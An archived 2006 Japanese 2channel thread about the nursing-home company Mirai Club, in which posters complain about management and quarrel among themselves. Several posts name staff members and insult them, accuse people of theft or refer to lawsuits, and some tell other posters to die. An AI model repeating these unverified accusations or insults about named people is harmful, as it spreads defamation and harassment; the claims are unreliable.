2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

老人ホーム未来倶楽部について語ろう!

1 :ななしのフクちゃん:2006/11/04(土) 21:12:27 ID:KgdP2iyl
だいぶ問題ありって書き込み多いけど、
老人ホーム未来倶楽部について心おきなく語りつくそう!

2 :ななしのフクちゃん:2006/11/05(日) 17:22:21 ID:vI6XnrMs
あらら・・・
誰も居ないんだぁ〜(笑
ここの施設ってもしかして、オープンに悩みを話すような前向きな人って
興味関心示さないトコなの?

3 :ななしのフクちゃん:2006/11/07(火) 00:32:36 ID:NvaFTnUd
スタッフの人数がぎりぎりなのに新規オープンをしようとしている。
既存の施設が、充実してないのに無謀としか考えられない!


4 :ななしのフクちゃん:2006/11/07(火) 00:39:23 ID:Rm9kd/7o
前スレ埋めてから書き込みしろよ

5 :ななしのフクちゃん:2006/11/07(火) 12:28:35 ID:Y86ZapkT
>>4
別にいいじゃぁん!
自由、自由!
また、言いたいこと言えないスレになっちゃうよ〜
自由で実名なしでいこ〜!!

6 :ななしのフクちゃん:2006/11/09(木) 20:05:16 ID:C3sNoQxF
前のスレ終了しちゃった?

7 :ななしのフクちゃん:2006/11/09(木) 22:58:28 ID:U1CI9APU
前スレの終わり方ってどうだったん?

8 :ななしのフクちゃん:2006/11/09(木) 23:04:55 ID:C3sNoQxF
あたしも↑と同じで終わりってどうなったの?あっというまになくなったよーな‥‥

9 :ななしのフクちゃん:2006/11/09(木) 23:12:59 ID:U1CI9APU
でしょう!!
すっごく気になるよねぇ
最後を知っている人!是非報告求む!!

10 :ななしのフクちゃん:2006/11/09(木) 23:45:55 ID:u9AI6pbm
損害賠償請求裁判で訴えられた小川K子被告(33)がいる施設
雑誌にバッシングされた施設
って書き込みで終わったんじゃないの

11 :ななしのフクちゃん:2006/11/10(金) 06:50:05 ID:7QPqG3IK
そうなんだ。
結局新展開はなかったんですね〜
でも、前スレで施設長がまた大幅に募集されているんでしょう?
施設長は皆短期間で首になるの?

12 :ななしのフクちゃん:2006/11/10(金) 19:29:24 ID:CXqpK1Gk
クビっていうより 辞めるから足りないんだよ 施設長ってここの人は使えない

13 :ななしのふくちゃん:2006/11/10(金) 20:47:47 ID:kGynDUhd
名前出さないって決めたわけでしょう。
10は辞めなさい。甘くみると大変な事になるよ

14 :ななしのフクちゃん:2006/11/10(金) 22:13:44 ID:9CIenlKX
小川って人が大変な事になったようだが

15 :ななしのフクちゃん:2006/11/10(金) 23:11:32 ID:7QPqG3IK
>>12
施設長だった人がすべて使えなかったわけじゃないでしょう?
施設長をいじめるケア真似や
長よりもっともっと使えない資格ばかりで口ばかりの副施設長もいるし。
本社も施設長をいい加減な詐欺まがいの営業より↓に見ているし、
まるで置物、責任押し付けるためにおいているだけじゃぁ、
仕事ができる人も、やる気のある人も何もできないよ。
ケアスタッフ達も自分たちを棚に上げて、協力もしないじゃない。
全員が全員、協力意識がない。
皆で反省だ〜!!
使える、できるはその後の話じゃろ〜(苦笑

16 :ななしのフクちゃん:2006/11/10(金) 23:57:42 ID:CXqpK1Gk
結局は進歩ないとこさ

17 :ミスターX:2006/11/11(土) 01:49:13 ID:cHnuHjLD
13番さんへ誰がどんなカキコしようが勝手じゃない??あなたには、関係ないし!!
なんだったら全部の施設の使えない施設長や本社の使えない社員の名前カキコしよ
うか??

18 :ミスターX:2006/11/11(土) 02:02:08 ID:cHnuHjLD
少しずつカキコしてこっと!!料理長の山口だっけ??あいつって都内で寿司職人だったって言うけどちらし寿司作った時食ったけどメチャまずいよ!!よくあれで料理長が務まるよ!!

19 :ミスターX:2006/11/11(土) 02:26:50 ID:cHnuHjLD
次は、府中の仲澤かな!!青葉で研修して戻って来たみたいだけど、変わらないよね!!
能無しババアって感じだよ!!まだ大谷の方がマシだったよ!!まあ大谷も使えなかったけどね^^


20 :ミスターX:2006/11/11(土) 02:46:54 ID:cHnuHjLD
なんだったらムカついた社員の名前出そうか^^まず川崎大師に居た神部だっけ!!デズニーランド好きなだけの
きちがいババア!!次に府中のケアーの日向!!彼氏が厨房の調理師だったみたいで、生意気な感じだったけど、
彼氏が居なけりゃ単なる×1のオバサンだろ!!30過ぎでココルルなんて着てんじゃねえよ!!ピーターパン
だと思ったよ!!しかも彼氏まで30歳なのにココルルを着てるって言うからバカップルだよ^^




21 :ミスターX:2006/11/11(土) 02:56:24 ID:cHnuHjLD
次も府中の厨房の杉田とかいう厨房主任だっけ!!料理は美味しくないし、誕生日会の
時のケーキは硬いし!!それでも調理師免許持ってるのって感じだったよね!若い調理
師さんや、女の調理師さんの作った、おやつが100倍美味しかったよ!!仲澤いわく
青葉では問題ないって言ってるけど仲澤の味覚を疑うよ!!


22 :ミスターX:2006/11/11(土) 03:03:47 ID:cHnuHjLD
一番は、会長だよね!!社員たちには、安月給なくせして、月に数回だけ施設の状態を
見に来るだけのくせして、自分は、運転手付のベンツワゴンなんて、差が有り過ぎない??
あんたなんて軽で充分じゃない??いや、軽よりも原付がお似合いだよ^^

23 :ミスターX:2006/11/11(土) 03:05:29 ID:cHnuHjLD
願いは1つ!!未来設計ごと倒産することだね!!


24 :ななしのフクちゃん:2006/11/11(土) 04:18:36 ID:d7AdWPH0
何で個人名出さないかわかってるのかね?
名誉棄損で訴えられて泣き見ないようにね!

25 :ななしのフクちゃん:2006/11/11(土) 06:14:56 ID:wQ73480F
訴えられる、訴えるは兎も角。。。

実名はやめようよ!
わかる人にはわかるイニシャルトークでも十分でしょう?
自分の実名は出さないわけだから。。。
社会人としてのルールは守りましょう!!

イニシャルトークだけでも、ここの会社の実態は充分に理解されるはずだから。

と、いうところで楽しく暴露、愚痴、不安、不平、不満・・。なんでもありって
ことでいこう!!


26 :ななしのフクちゃん:2006/11/11(土) 12:41:36 ID:aP5+6yXW
そんな会社にいるあなたも、同類。

27 :ななしのふくちゃん:2006/11/11(土) 15:13:06 ID:wiEewzLv

17〜25までかいた女は同人物だよな。よく考えて書き込めよ
てめえの事だな。おまえみたいなしつこい書きこはだめだな。
きちんとやれよな。

28 :ななしのふくちゃん:2006/11/11(土) 15:15:04 ID:wiEewzLv
調べたら23までだった

29 :ななしのフクちゃん:2006/11/11(土) 20:57:28 ID:N/83jwKz
訴えられた小川K子って人は名誉毀損で訴えられたの?

30 :ななしのフクちゃん:2006/11/11(土) 21:48:28 ID:N/83jwKz
[いうyt]の人は自分の名前を出されたの?

31 :ミスター]:2006/11/12(日) 14:19:03 ID:nnaXwIq9
またまた来ました^^私が誰かなんて分かるわけ無いですよ!!
し辞めるまで施設の中で起きた事紹介しますね^^そうそう
もう一つ報告があります!!前のデーターがあるので(1000までいった
カキコ)を全ての新聞社、テレビ局、週刊誌の会社に
匿名で、このような、いんちきで、おかしい会社が在る事を情報提供します!
一日も早く潰れることを願うミスター]でした^^



32 :ななしのフクちゃん:2006/11/12(日) 18:47:04 ID:YsJEQ1RG
ばれてるぜ 死んでしまえ

33 :ななしのフクちゃん:2006/11/12(日) 21:34:26 ID:y+ijsjwS
>損害賠償請求裁判で訴えられた職員小川K子(33)がいる施設
雑誌にもバッシングされた施設
すでに週刊誌に取り上げられたようだが
またか

34 :ななしのフクちゃん:2006/11/12(日) 21:46:24 ID:YsJEQ1RG
いい加減そのネタあきたんだけど

35 :ななしのフクちゃん:2006/11/12(日) 22:14:59 ID:wlpNL85m
34>>に同感

だけど同じ人のカキコだから、呆れている気分も含めて。。。
死んでしまえ!やめようよ。
いいじゃない?自分と考えやあらわし方が違う人がいても、
無視して自己主張すればいいんだし(苦笑
私はこの会社の社員じゃないけど、福祉業界の人間として
ちょっとと思うよ。
それ以上に、ここの会社のうわさ聞いてどんな会社だろうと思って
ずっと読んでいたけど・・・
ちょっと酷いのは事実なのかな?
それとも、ここって社員は書き込みしていないの?


36 :ななしのフクちゃん:2006/11/13(月) 00:01:47 ID:maIdH8sI
↑福祉業界にいてほしくないタイプだな。
社会の迷惑だからさっさと辞めてくれ。

37 :ななしのフクちゃん:2006/11/13(月) 05:38:14 ID:GuKOAfS3
ミスターX あなたが誰かは分かってるよ
今は幸せじゃないんだね 
だけど何の腹いせか知らないけど 今頃になってどうしてこんなことするの?
自分が惨めになるだけだよ


38 :ななしのフクちゃん:2006/11/13(月) 07:26:26 ID:77p+F8eE
かなりしあわせなんすよ みじめじゃないす 残念!(笑

39 :ななしのフクちゃん:2006/11/13(月) 10:10:43 ID:1I9MRV8z
>>36ってどうして、全否定しかできないの?
何故、>>35が福祉業界にいて欲しくないタイプなの?
どんなタイプが必要とされ、求められているの?
あなたはどんなタイプなの?

>>37さん、誰に対して発言しているの?
>>38さんって>>36さんなの?

40 :ななしのフクちゃん:2006/11/13(月) 11:47:55 ID:maIdH8sI
↑身近に話し相手作りなよ

41 :ななしのフクちゃん:2006/11/13(月) 13:11:57 ID:1I9MRV8z
どうしてそうなるのかなぁ(笑
ここに書き込みしている人は、話し相手いないってことになるの?
じゃぁ、チェックいれている貴方もいないんだね(爆

42 :ななしのフクちゃん:2006/11/13(月) 14:55:39 ID:maIdH8sI
話しかけてくるなよ。気持ち悪い。

43 :ななしのフクちゃん:2006/11/13(月) 16:05:01 ID:1I9MRV8z
おいおい
語りかけてきたのは、>>42だろうが!

44 :ななしのフクちゃん:2006/11/13(月) 16:30:36 ID:maIdH8sI
↑41だろ

45 :ななしのフクちゃん:2006/11/13(月) 17:19:15 ID:maIdH8sI
39は独り事かよ

46 :ななしのフクちゃん:2006/11/13(月) 18:12:55 ID:77p+F8eE
きっと独り言さびしいね

47 :ななしのフクちゃん:2006/11/13(月) 20:49:48 ID:1I9MRV8z
何だか、ここの職場が低ノウさんばかりと評価していた人が多いのが
>>45>>46の発言者の書き込みだけ読んでいてわかってきた。
話しかけるなと言ったかと思えば、
今度は独り言という・・・
じゃぁ、あなたたちは誰に話しかけているのか?(笑
別にここは、現職者だけのスレじゃない。


48 :ななしのフクちゃん:2006/11/13(月) 21:55:13 ID:77p+F8eE
現職じゃねーよ おまえもテイノウ

49 :ななしのフクちゃん:2006/11/13(月) 22:11:14 ID:1I9MRV8z
じゃぁ、ほっとけば・・・
ここまでだれかれ構わず絡んでいると、
>>48さんこそ、寂しがりやか可笑しい人って感じちゃうよ(笑
お互い、テイノウ同士自由に書き込みしましょうね

50 :ななしのフクちゃん:2006/11/14(火) 10:01:16 ID:p1PaXmOy
(笑
(爆
使うなよ!!目障りなんだよ!!!
したり顔してんじゃねよ。!!!
だからクレームくるんだよ!!!

51 :ななしのフクちゃん:2006/11/14(火) 19:09:10 ID:LwbD4kff
クレーム?

52 :ななしのフクちゃん:2006/11/14(火) 19:09:30 ID:BGord1gC
↑は誰にキレているの?

53 :ななしのフクちゃん:2006/11/14(火) 19:11:47 ID:LwbD4kff
キレてんじゃなくて、きっと焦れているんだよ。
自分が馬鹿にされているってことにさ


54 :ななしのふくちゃん:2006/11/14(火) 21:28:02 ID:ph4OZliK
ミスターXは誰だか解かるよ。辞めてまでしがみつくなんてね。自分の都合で退職したのにね。寂しい人生なんだね、貴女のためにも今の仕事頑張って


55 :ななしのフクちゃん:2006/11/15(水) 00:32:09 ID:WRJ5gfjK
↑ミスターXの今の仕事って何しているの?
しがみ付いているのかな?
気にしているのは当たっているんだけど、
それがさびしいって言うのは、あまりにも胆略的なんじゃん。
辞めてもここを定期的に見ている人ってかなりいるんじゃないの?
ねぇミス>>54さん?


56 :あぼーん:あぼーん
あぼーん

57 :ななしのフクちゃん:2006/11/15(水) 07:15:24 ID:tnHDx4yG
↑おまえが早く死んじゃえよ(笑

58 :ななしのフクちゃん:2006/11/15(水) 07:39:21 ID:WRJ5gfjK
>>56
実名はやめようよ!!

59 :ななしのフクちゃん:2006/11/15(水) 08:18:27 ID:PhIzb4ld
池沼にはさわらないように、放置推奨

60 :ななしのフクちゃん:2006/11/15(水) 08:49:18 ID:WRJ5gfjK
ミスターXって複数人いるんだね(笑


61 :ななしのフクちゃん:2006/11/15(水) 10:43:14 ID:XYzgvV6c
噂を聞いて覗いてみたら何これ!誰!?私の事を暴露した奴!三浦T江か?相馬Y生か?金子N徳か?南行の奴だろ!お前らだって共犯みたいなもんだろ!

62 :ななしのフクちゃん:2006/11/15(水) 11:53:54 ID:tnHDx4yG
抗議は直接本人へどうぞ

63 :名無しのフクちゃん:2006/11/15(水) 20:36:54 ID:HesOC89m
ごちゃごちゃ言っても始まらんだろ。誰だっていいじゃんけん。後は62と同じ。

64 :ななしのフクちゃん:2006/11/15(水) 23:44:47 ID:XYzgvV6c
三浦、相馬、金子、財布の金を盗まれたくせに!ロッカーの鍵をかけてなかっただろ!自己管理できなかったのが悪いんだよ!いいきみ!

65 :ななしのフクちゃん:2006/11/15(水) 23:55:59 ID:tnHDx4yG
馬鹿だねー↑って…。(笑金盗られていい気味ってあんたが やったんだろ(笑そんなこと暴露してナンボのもんよ?金とって暴露 訴訟うけたほうがよっぽどのアンポンだ 死ね

66 :ななしのフクちゃん:2006/11/15(水) 23:56:42 ID:XYzgvV6c
相馬、三浦!二人とも太り過ぎなんだよ!豚のくせに男に色目使うな!金子、お前は仕事にプライベート持ち込まないなら金盗まれた事もプライベートだろ!持ち込むな!おとなしく盗まれてろ!不細工!

67 :名無しのフクちゃん:2006/11/16(木) 00:20:23 ID:Enn6xrJ+
上の三人に何の恨みがあるわけ。おまえかなりしつこいな。確かにロッカーに鍵をかけてないのは悪いけど盗んだ野郎はもっと悪いんじゃないか。窃盗罪だぞ。おまえも共犯か。

68 :ななしのフクちゃん:2006/11/16(木) 10:35:41 ID:FZAIfNe+
ちょっと!ちょっと!ちょっと〜!
何なの?この状態は!!!
一部施設の個人攻撃したいなら、そういうスレを立てて思う存分やったらどう?

69 :ななしのフクちゃん:2006/11/16(木) 12:34:40 ID:3k/3x3Al
↑の意見に賛成!語りつくせない話題だらけで つまんないよ 個人的攻撃は本人か別のとこでやってよね

70 :××:2006/11/17(金) 09:18:44 ID:TEN6KO7P
○×

71 :ななしのフクちゃん:2006/11/17(金) 11:09:23 ID:q7dAijr+

株式会社未来設計
http://qb5.2ch.net/test/read.cgi/saku2ch/1163728840/

1 名前:開発部 嶋田貴之[] 投稿日:06/11/17(金) 11:01 HOST:s147.GtokyoFL3.vectant.ne.jp<8080><3128><8000><1080>
対象区分:[法人/団体]管理人裁定待ち
削除対象アドレス:
http://society3.2ch.net/test/read.cgi/welfare/1162642347/
削除理由・詳細・その他:
上記アドレスのスレッドですが、社員及び顧客の実名が
記載されています。
特に顧客の実名に関しては、個人情報漏洩でクレームに
つながりかねないかと思われます。
上記の理由により、スレッド削除を依頼する次第です。
宜しく御願いいたします。



72 :ななしのフクちゃん:2006/11/17(金) 14:29:14 ID:5MHxBVwu
何だか知らないけど、スレ立てた意図と違う書き込みだらけになってるね〜

腐った場所には、腐った人達しかこないってことかな?

実名はルール違反だし。
顧客情報を流しているのが事実だとすれば、
削除してもらわんとね・・・

73 :ななしのフクちゃん:2006/11/17(金) 17:39:34 ID:mpPBaCYa

株式会社未来設計 開発部 嶋田貴之
http://qb5.2ch.net/test/read.cgi/saku2ch/1163728840/
>>10 >>18-21 >>29 >>33 >>61 >>66 >>116


高齢者施設による不動産の有効活用 株式会社未来設計 | トップページ
http://www.miraisekkei.jp/

74 :ななしのフクちゃん:2006/11/17(金) 18:22:34 ID:vDCWE+Up
会社が 1番情報漏洩ではないですか?かえって逆効果になっていると思うのですが

75 :ななしのフクちゃん:2006/11/17(金) 18:23:46 ID:weVs1KFO
p2

76 :ななしのフクちゃん:2006/11/17(金) 19:01:39 ID:LUXiRZFh
はじめてこのスレ観ました。南行徳、行徳に関することに興味があります。

77 :ななしのフクちゃん:2006/11/17(金) 19:39:30 ID:vDCWE+Up
またフリダシかい。興味もたなくていいよ たいしたとこじゃないんだからさ 止めたほうが利口だよ

78 :ななしのフクちゃん:2006/11/17(金) 21:07:09 ID:riA2vrvO
この削除依頼実名でだした馬鹿は、口の効き方知らないって本社で評判の奴だろ?

テラバロス

79 :ななしのフクちゃん:2006/11/17(金) 21:33:27 ID:xAMpBtzG
会社に苦情を言ってもどうにもならない
裁判沙汰になる前に会社がもっと早く対応すればよかったんだ
謝っても取り返しのつかない事をここの職員はしたんだ
会社は責任をとる事もできない
取り返しがつかない事になったんだから責任のとりようがない
早くその職員を解雇すればよかったんだ
そうすれば事態は防げた
どうしてこの会社は何もしなかったんだ
何が苦情相談だ
相談にのるような会社ではないから裁判沙汰になったんだ

80 :ななしのフクちゃん:2006/11/17(金) 21:43:47 ID:vDCWE+Up
所詮は身内も護れない浅はかな会社だよね 逆効果って気付かない社員 ほんと馬鹿ぞろいだ

81 :ななしのフクちゃん:2006/11/18(土) 00:37:56 ID:fbrj6naE
何だか、アホらしいスレになちゃったなぁ〜
立ち上げた意味がまったぁくなくなった・・・


82 :ななしのフクちゃん:2006/11/18(土) 00:39:12 ID:fbrj6naE
sage

83 :ななしのフクちゃん:2006/11/18(土) 09:33:06 ID:N9Z054u4
連投埋め立ては2ちゃんねるの回線やサーバへ負荷をかける
迷惑行為であり「悪質な荒らし」です。
2ちゃんねるは迷惑行為に対して、アクセス規制やプロバイダへ通報等
断固とした措置を取ります。

参考URL「悪質なコピペ荒しへの対応について」
http://www.2ch.net/accuse2.html

自覚がある方は、充分に理解した上、賢明な判断をするようにお願いします。

84 :ななしのフクちゃん:2006/11/18(土) 11:05:55 ID:fbrj6naE
ほっとしたぁ〜。
これで平和なスレになるのかも・・・

85 :ななしのフクちゃん:2006/11/18(土) 13:16:25 ID:ozE9/xrl
荒れすぎだもんねー

86 :ななしのフクちゃん:2006/11/18(土) 15:30:22 ID:X7EDtvG/
各 施設の状況が知りたいです! いいことでも悪いことでもいい 教えて下さい〜
どこの施設でもいいよ!

87 :ななしのフクちゃん:2006/11/18(土) 16:10:48 ID:ozE9/xrl
とくに聞きたい施設は?

88 :ななしのフクちゃん:2006/11/18(土) 20:46:35 ID:6+e8jKkZ
やっぱり南行徳かなぁ〜

89 :ななしのフクちゃん:2006/11/18(土) 21:17:57 ID:ozE9/xrl
その施設ネタならあきたし 教えないよ

90 :ななしのフクちゃん:2006/11/18(土) 21:52:59 ID:X7EDtvG/
誰 勝手に人のふりしてる人…
江戸川か日本橋が知りたいです 江戸川は敷地内にクリニックがあるって話だけど…
南行徳は私もあきたから もう結構

91 :ななしのフクちゃん:2006/11/18(土) 22:07:47 ID:zpiWvJ/f
南行徳は裁判に訴えられた職員小川K子被告(33)がいる施設っていうネタは飽きたね。

92 :ななしのフクちゃん:2006/11/18(土) 22:15:03 ID:zpiWvJ/f
88は何を知りたい?

93 :ななしのフクちゃん:2006/11/18(土) 23:00:39 ID:ozE9/xrl
CSなの?それともNs? Nsならワルイコト言わないから辞めたほうがいいよ

94 :ななしのフクちゃん:2006/11/18(土) 23:04:09 ID:6+e8jKkZ
88です。南行徳は妊婦さんが働いてると聞いたのですが、それもほとんど見守りだけで皆と同じ給料貰ってるって。この情報本当ですか?知ってる方教えて下さい。

95 :ななしのフクちゃん:2006/11/18(土) 23:39:51 ID:ozE9/xrl
妊婦が働いちゃいけない?↑のニュアンスだと給料泥棒とでも言いたいの?お腹にいる10ヶ月少し 周りがフォローしてあげればいいんじゃないの?妊婦事情だってあるんだよ

96 :ななしのフクちゃん:2006/11/18(土) 23:43:49 ID:NIF5zO3b
                   /;;::r‐〜-ミ、     | >>83お前ってほんと
                 4~/へi::::::;/,ヘミ7      惨めだな。 
                 '-l|<>|:::::|<フ1|i'    ノ 
                    l! '" |::::l、~`リ    へ 
              /`ー、  ハー;";::i:::ヾイl! ,r'~`ヽ、 \ 
           ,.ィ" ri l i ト、 1:|`丶:;;;:イ' ill!7、 、 y;  ヽ、_` ー――――― 
      ,. -‐''" 、 くゝソノリ~i | - 、 , -‐'7ハ ヾニト-    ~` ー- 、_ 
   , ィ ´      ,ゝ、_ `r'   l |  、レ // `テ三..ノく _ `       ヽ、 
  /       , -' ,、  `、_)   l,i,  i //  (/  ...,,;;;;:` 、        ヽ 
 ;'       '" ノ ;;;;::::      i !  : //    .....:::::;;イ、_、_\ _    _ノ 
 l ..,, __,ィ"-‐´ ̄`i::::: ゙゙゙= ...,,,,,. l | ,//  - = ""::;; :/       ` '''' '" 
            ヾ :;;;,,     ,i l,//     ,,..," /         _,,.....,_ 
   ,. -- .,_        \ :;,.   ;'  V ;!   `;  /;: ノ      ,.ィ'"XXXXヽ 
  /XXX;iXXミ;:-,、     ヾ  '" ''' /./!  ヾ   /    ,. - '"XXXXXXXX;i! 
 ,!XXXXi!XXXXX;`iー;,、  i   、. / ;:::゙i   ;: , |  ,. r'"XXXXXXi!XXXXXX:l! 
 |XXXXX;|XXXXX;|::::::::|`ヽ、    ,! ,': : :|    ,.レ"::::|XXXXXXX|XXXXXXX;l! 
 !XXXXX;|XXXXX:|:::::::::i  `   ;! : :  i!  / !:::::::::|XXXXXXX|!XXXXXXX| 
 XXXXXx|XXXXX;!:::::::::::!   `. /::    | '"   l:::::::::::|XXXXXXX|XXXXXXX | 
 XXXXXx!XXXXxリ:::::::::::!    |::     |    i:::::::::::ゞXXXXXツ1XXXXXXX| 
 XXXXX/ \XXソ::::::::::/     i!::    ノ     i!::::::::::::ゞXX:/  lXXXXXXX| 
 XXXX:/   `ヾ::;;;;;:ツ      ヾ;::: ; ノ      ヾ:;;:::::::ゝ'"     ヾXXXXX | 

97 :ななしのフクちゃん:2006/11/18(土) 23:44:49 ID:X7EDtvG/
CSは大丈夫なの?NSはなんで辞めた方がいいの?

98 :ななしのフクちゃん:2006/11/18(土) 23:44:52 ID:NIF5zO3b
>>1よ。お前みたいな奴をみると、あの日のことを思い出すよ。 
2001年8月25日。2ちゃんが本格的に閉鎖になりかけた日だよ。 
転送量が多すぎて、費用が月700万もかかってるって発表されて、「数日中に閉鎖」って予告されてさ、 
その日のうちにあっちこっちの板が封鎖されてた日だよ。 
あのときのUNIX板の住人、カッコよかったんだぜ。「総力を結集」ってのはまさにああいう状態だよ。 
転送量を1/3に削減しないと閉鎖、ってもんだから、新しいプログラム組んでさ、 
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は1/3だったのに 
1/16まで圧縮に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。 
でもよ、そうやって頑張る人がいた一方で、「ボクの肛門も閉鎖されそうです」とか駄スレ立ててたバカも 
いたわけだよ。ちょうど、今のお前みたいにな。 
だからよ、俺たちは総力を結集して、お前のバカ度を1/16に圧縮しようと思うよ。 
ま、圧縮後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。 
要するに俺らの力を結集してもお前を助けることができないってことだ。 
わかったら、まわりに迷惑をかけないようにひっそりと死んでくれよな

99 :ななしのフクちゃん:2006/11/18(土) 23:45:33 ID:NIF5zO3b
      わ          ,..-―-、           ク 
              |         /:::::::::::::::::l       ソ  
                 ∩  /::::::::::::::::::::|      ,、 ス ! 
      -―-、        |⌒ヽ/::::::::::::::::::::::|    _/|ノ レ 
   /´Y    (´ヽ  ,、    l: : : i::::::::::::::::::::::::|-―'´: :丿  だ 
 ,、 _し' l     lヽJ/|ノ   \: |∧/l/|ノレ : : : :/   | 
 Y: : `ー`ー-―'´一': : |     /: : : : : : : : : : ::i-‐'′    
  \: : : : : : : : : : : : /      /: : : : : : : : : : : |         
   Y: : : : : : : : :r'´      /: : : : : : : : : : : :| 
   /: : : : : : : : : :|       /: : : : : : : : : : : : | 
  /:: : : : : : : : : ::|      / : : : : : : : : : : : : | 
  /: : : : : : : : : : : |      /: ::_: : : : : : : : : :| 
  `77ー--┬r一'       ̄/ / ̄`ー-┬r-' 
  l'´)   ├|           l'´)     |~| 
  し'    (ニ⊃        し'      (ニ⊃ 


             __ 
                /〃 ┼‐┼〃__ 
             /\    ノ                __ 
                      __  , -――-、  /\ノ 
                      ヽ/\l::::::::::::::::::::\ /: : / 
         ,..-―-、/)       |: : :|::::::::::::::::::::::/: : / 
     /⌒Y    (_ノ  /)       |: : :|:::::::::::::::::::::|: : : / 
      ̄l ̄l、     ) /`〉     ヽ:: :|::::::::::::::::::::l: : :/ 
         l: : :`ー--‐'‐'´: :/        \|∧ハ/l/: ::〈 
       \: : : : : : : : : :く         |: : : : : : : : : : `ー-┐  ,.、 
         l: : : : : : : : : :`ー―┐ ,、   |: : : : : : : : : : : : : : |二 
 ′

100 :ななしのフクちゃん:2006/11/18(土) 23:46:25 ID:NIF5zO3b
   ☆ チン     マチクタビレタ〜 
                         マチクタビレタ〜 
        ☆ チン  〃 ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
          ヽ ___\(\・∀・) <  クソスレあぼ〜んはまだ〜? 
             \_/⊂ ⊂_ )   \_____________ 
           / ̄ ̄ ̄ ̄ ̄ ̄ /| 
        | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  | 
        |  静岡みかん |/

101 :ななしのフクちゃん:2006/11/19(日) 00:07:09 ID:fbrj6naE
>>98さんへ
思いっきり感じ違いしているぞ!
>>1は全くその後、ここのスレに参戦してないぞ(笑
思いっきり多重人格している>>98はもしかして、
前スレのときも多重人格演じてた奴と同一人物か?

102 :ななしのフクちゃん:2006/11/19(日) 12:26:58 ID:XNoYHrDZ
ここって攻撃的な人ばかり?

103 :ななしのフクちゃん:2006/11/19(日) 12:55:09 ID:XNoYHrDZ
…ってかさ そもそも多重人格ってただのカキコで どうしていいきれる?それがわからないですが…?

104 :ななしのフクちゃん:2006/11/19(日) 17:52:46 ID:4YljcDFQ
ここの人って攻撃的なんだよね。
話しならず裁判沙汰になったのも納得。
88の質問に普通に答えてあげられる人っていないの?

105 :ななしのフクちゃん:2006/11/19(日) 19:42:09 ID:6Yo1Nlfw
確かに。。反省。
>>104さん、応えてあげて!!

106 :ななしのフクちゃん:2006/11/19(日) 20:35:39 ID:4YljcDFQ
↑応えてあげてと言われても知らないよ。
ここって南行徳の職員いるのかな?

107 :ななしのフクちゃん:2006/11/20(月) 11:58:39 ID:y5m/Fi6R
↑いい加減ここの話ウザイんだよね☆この施設ネタはしばらくいらねーよ

108 :ななしのフクちゃん:2006/11/20(月) 12:33:01 ID:Q2zgDQO8
>>107
攻撃みたいな発言の仕方は考えましょうよ。
質が悪すぎ!!!!!

109 :ななしのフクちゃん:2006/11/20(月) 16:28:54 ID:y5m/Fi6R
108も含めテイノウな方ばかりだから 批判も増えると思うのですが

110 :ななしのフクちゃん:2006/11/20(月) 18:15:22 ID:k54so9Nl
107みたいな発言してる人がいるから批判されると思うけど気のせい?攻撃的になってる人こそ馬鹿っぽいし。↑あなたが消えれば?あなたがここの会社の人なら会社の印象悪くしているよ。

111 :ななしのフクちゃん:2006/11/20(月) 18:33:47 ID:k54so9Nl
109ってここの社員かな?
タチ悪いよね。
こんなのばっか?

112 :ななしのフクちゃん:2006/11/20(月) 19:21:34 ID:y5m/Fi6R
あほかー(笑 ここの社員なわけないだろが おまえらうぜー嫌ならテメェらが消えろ

113 :ななしのフクちゃん:2006/11/20(月) 20:09:51 ID:zO63OKYN
ちなみに>>112は南○○の生活相談員

114 :ななしのフクちゃん:2006/11/20(月) 20:56:56 ID:y5m/Fi6R
馬鹿な奴 あほくさ

115 :なんだかんだ言いながらこのスレが気になってしょうがない:2006/11/20(月) 21:04:32 ID:yJaDnVxT
107 名前:ななしのフクちゃん[] 投稿日:2006/11/20(月) 11:58:39 ID:y5m/Fi6R
↑いい加減ここの話ウザイんだよね☆この施設ネタはしばらくいらねーよ

109 名前:ななしのフクちゃん[] 投稿日:2006/11/20(月) 16:28:54 ID:y5m/Fi6R
108も含めテイノウな方ばかりだから 批判も増えると思うのですが

112 名前:ななしのフクちゃん[] 投稿日:2006/11/20(月) 19:21:34 ID:y5m/Fi6R
あほかー(笑 ここの社員なわけないだろが おまえらうぜー嫌ならテメェらが消えろ

114 名前:ななしのフクちゃん[] 投稿日:2006/11/20(月) 20:56:56 ID:y5m/Fi6R
馬鹿な奴 あほくさ

116 :ななしのフクちゃん:2006/11/20(月) 22:02:46 ID:UE7O7YmJ
□□□□□□□□□□□□□□□□□□□□□ 
□■■■■■■■■■□□■■■■■■■□□ 
□□□□■■□□□□□□□□□■□□□□□ 
□□□■■■■■□□□□■■■■■■■□□ 
□□■■□■□■■□□□□□□■□□□□□ 
□■□□□■□□□■□□■■■■■■■□□ 
□□□□□■□□□□□□□□□■□□□■□ 
□□□□□■□□□□□□□□□■■■■■□ 
□□□□□□□□□□□□□□□□□□□□□

117 :ななしのフクちゃん:2006/11/20(月) 22:04:02 ID:UE7O7YmJ
┌──────────────────────―─―┐ 
│                                      | 
│                                      | 
│                                      | 
│                                      | 
│                ∧_∧                      | 
│               ( ´∀`)                | 
│               (    )                 | 
│               | | |                     | 
│               (__)_)                  | 
|              2ちゃんねる               | 
│                                      | 
│            スレッドを終了しています…           |   
│                                      | 
│  ☆次レスはありません                        | 
│                                      | 
|                                      | 
|                                      | 
└───────────────────────――┘ 

118 :ななしのフクちゃん:2006/11/20(月) 22:25:04 ID:k54so9Nl
生活指導員か。
なるほどね。
タチの悪い言葉遣いになったり、いきなり敬語になったり、取り乱してるんだろか。
生活指導員なら人を攻撃したり見下したりしないで、穏やかな言葉遣いで書き込めば会社のイメージ良くなるのにね。
妊婦さんが働いてる事だって、丁寧に説明すれば誰も批判しないだろう。
大人げないな。

119 :ななしのフクちゃん:2006/11/20(月) 22:32:05 ID:y5m/Fi6R
はいはい 勘違いされたままもあほくさいけど ここはもうさいごにしますわ 生活なんだかしらんが まったくかんけーないし(笑

120 :ななしのフクちゃん:2006/11/20(月) 22:41:51 ID:k54so9Nl
↑ならば、やたら話題を避けたがるのはなぜ?
しかも、かなりご立腹なようで。
関係ない人が何故そこまで?

